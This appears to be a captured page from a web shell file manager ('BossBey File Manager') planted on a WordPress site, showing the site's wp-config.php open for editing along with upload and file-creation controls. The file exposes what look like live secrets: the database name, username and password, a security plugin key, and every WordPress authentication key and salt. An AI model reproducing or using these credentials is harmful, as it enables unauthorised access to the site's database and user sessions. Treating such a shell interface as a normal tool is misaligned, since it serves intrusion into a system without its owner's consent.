BossBey File Manager
PHP:
8.2.28
OS:
Linux
User:
www-data
Root
/
var
/
www
/
frehleyit
/
wordpress
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-config.php
<?php define( 'WP_CACHE', true ); //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', 'm23PsUMNK9F9riolgGUrafNF30gQ3JKYpbm8qeMN68LI7zEJTBeaBLFfGBh8ZIcc'); //END Really Simple Security key define('FS_METHOD', 'direct'); define('WP_MEMORY_LIMIT', '256M'); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'frehleyi_zq3y1' ); /** Database username */ define( 'DB_USER', 'frehleyi_zq3y1' ); /** Database password */ define( 'DB_PASSWORD', 'D.PbWgIMmYf0u61f8mO20' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'SoXnf8dOvbulpav3mhWBgvzZFB0ARtaNHZiFng0CQm3qgwQADXcwihTQmjEpB1w5'); define('SECURE_AUTH_KEY', '5Nr8ccIeRUourHS7gmFFQN2166tXKXpKQIedVn7PfNG20PZyJGZKZqPM3vnmFAJG'); define('LOGGED_IN_KEY', 'aOmkbNX2qf6KZqayB7KoLCVhA9SailTHrUGLgnJKQeUc6KiS8JuFqP06sLbenZnW'); define('NONCE_KEY', 'JmqY141CN1XbyNAO9zXsR7hsaGVBsvMB61QipoPIstHpE07QbgvwARDSABmZmO4h'); define('AUTH_SALT', '2MhYoC8xhT4BS7iGEyRll7JHRzjMsPd0LKGo6U7GBjXf84ljr8EWFVjCYL7Ig51h'); define('SECURE_AUTH_SALT', 'QTaQp1mz07mN97QTWC8K0qhNeWOjNwE96SNHiju7f9QchCZVbbuN40TSCnxfpGl6'); define('LOGGED_IN_SALT', 'y18wIvqND2kUeRzND5b0ljwWwLiQ0nyTb5TRVIB09UTveQJNxQ05XfsszuDFezLU'); define('NONCE_SALT', 'GqivK2B2DDVSZj05s0MN5rde8oeG1SjCcqKbR7RFqY5cYCT7WlwmS6FMGw6wJusV'); /** * Other customizations. */ define('WP_TEMP_DIR',dirname(__FILE__).'/wp-content/uploads'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'pio5_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Save
Cancel